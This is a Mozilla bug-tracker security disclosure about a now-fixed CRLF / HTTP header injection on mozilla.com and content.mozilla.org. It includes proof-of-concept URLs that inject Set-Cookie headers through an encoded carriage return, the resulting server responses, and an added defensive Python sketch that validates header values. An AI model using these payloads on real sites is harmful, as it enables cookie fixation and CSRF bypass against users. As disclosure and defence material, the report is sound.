Closed
Bug 1280116
Opened 8 years ago
Closed 8 years ago
[mozilla.com] [content.mozilla.org] CRLF / HTTP Header Injection
Categories: www.mozilla.org :: Bedrock, defect
Tracking: Not tracked
Status: RESOLVED FIXED
People: Reporter: blackfan, Unassigned
Details: Keywords: sec-moderate, wsec-http-header-inject; Whiteboard: [reporter-external] [web-bounty-form] [verif?]
PoC (any browser except Firefox):

https://mozilla.com/%23%0dSet-Cookie:crlf=injection
https://content.mozilla.org/%23%0dSet-Cookie:csrftoken=injection;domain=.mozilla.org;

HTTP Response:

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Tue, 14 Jun 2016 20:19:55 GMT
Location: https://www.mozilla.com//# <= injection \r
Set-Cookie:crlf=injection

This vulnerability could be used in combination with others. For example, XSS via Cookie or session fixation. Also, it can be used to bypass CSRF protection on Django web applications.
Flags: sec-bounty?
Updated•8 years ago
Comment 1•8 years ago
Somewhat limited by the maximum length of the overwritten header, this bug is very similar to other issues we've had just like it, such as bug 1229680 and bug 1229996.
Status: UNCONFIRMED → NEW
Component: Other → Bedrock
Ever confirmed: true
Keywords: sec-high, wsec-http-header-inject
Product: Websites → www.mozilla.org
Summary: [mozilla.com] [content.mozilla.org] CRLF Injection → [mozilla.com] [content.mozilla.org] CRLF / HTTP Header Injection
Version: unspecified → Production
This was an especially difficult issue to confirm and fix, as the carriage returns screwed up most normal methods of inspection. Thank you for your report.

We've altered the affected cluster to protect against the described attack and are working to resolve the underlying technical problem that led to this issue.

I verified that Chrome is interpreting "One: Two\r\nThree: Four\rFive: Six\r\n" as three headers, rather than two headers, which does not match Firefox and libcurl's behavior. We strongly advise reporting this issue to the browser(s) you found to be affected, since that's a completely unexpected behavior to us, and permitted an unusual attack surface.

Theoretically resolving as FIXED, but please feel free to REOPEN within the next week or two if you find any further issues with this specific attack vector.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
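As an added illustration of the parsing difference described in the comment above (this is not bedrock's code nor code from the bug's participants): a strict and a lenient header splitter applied to the comment's sample string, plus a hypothetical `redirect_location` helper showing the defensive check, refusing any CR or LF in a value built from a request path, at the point where user input reaches a response header.

```python
import re
from urllib.parse import unquote

# Sample header block quoted in the comment above: the second line ends with a
# bare "\r" instead of "\r\n".
SAMPLE_HEADERS = "One: Two\r\nThree: Four\rFive: Six\r\n"

# Strict rule (Firefox / libcurl behaviour, per the comment): only CRLF or a
# lone LF terminates a header line; a bare CR is ordinary value data.
STRICT_EOL = re.compile(r"\r\n|\n")
# Lenient rule (Chrome behaviour, per the comment): a bare CR also terminates
# the line, so the CR-separated remainder becomes an extra header.
LENIENT_EOL = re.compile(r"\r\n|\n|\r")


def parse_headers(raw: str, eol: re.Pattern) -> list:
    """Split a header block into (name, value) pairs using the given line-end rule."""
    headers = []
    for line in eol.split(raw):
        if not line:  # empty string left after the final terminator
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def header_value_is_safe(value: str) -> bool:
    """True only if the value contains neither CR nor LF anywhere.

    Checking for a lone CR matters: a check that only looks for "\r\n" would
    have let the "%0d" payload from this report through to lenient clients.
    """
    return "\r" not in value and "\n" not in value


def redirect_location(path: str) -> str:
    """Hypothetical helper: build a Location value from a request path.

    The path is percent-decoded first so that an encoded CR/LF is caught
    before it is emitted into the header.
    """
    decoded = unquote(path)
    if not header_value_is_safe(decoded):
        raise ValueError("refusing to emit a header value containing CR/LF")
    return "https://www.mozilla.com" + decoded
```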
Comment 3•8 years ago
Seems mozilla.com is still vulnerable.

https://mozilla.com/%0aSet-Cookie:crlf=injection >> unable to process paths containing %0D

https://mozilla.com/%0dSet-Cookie:crlf=injection
Location: https://www.mozilla.com//\r
Set-Cookie:crlf=injection
Hrm. More testing, one moment.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Comment 6•8 years ago
Yes, the vuln is fixed now.
Okay. Thank you, again! You find the most interesting bugs with these things. Very appreciated. Please let us know if you file a bug with Chrome or any other browsers, so that we can find them from here.
Status: REOPENED → RESOLVED
Closed: 8 years ago → 8 years ago
Resolution: --- → FIXED
Comment 8•8 years ago
This is less severe than bug 1229680 since the direct XSS risk is not there. Cookie fixation attacks against mozilla.org are still a potential concern.
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high → sec-moderate
Updated•8 years ago
Group: websites-security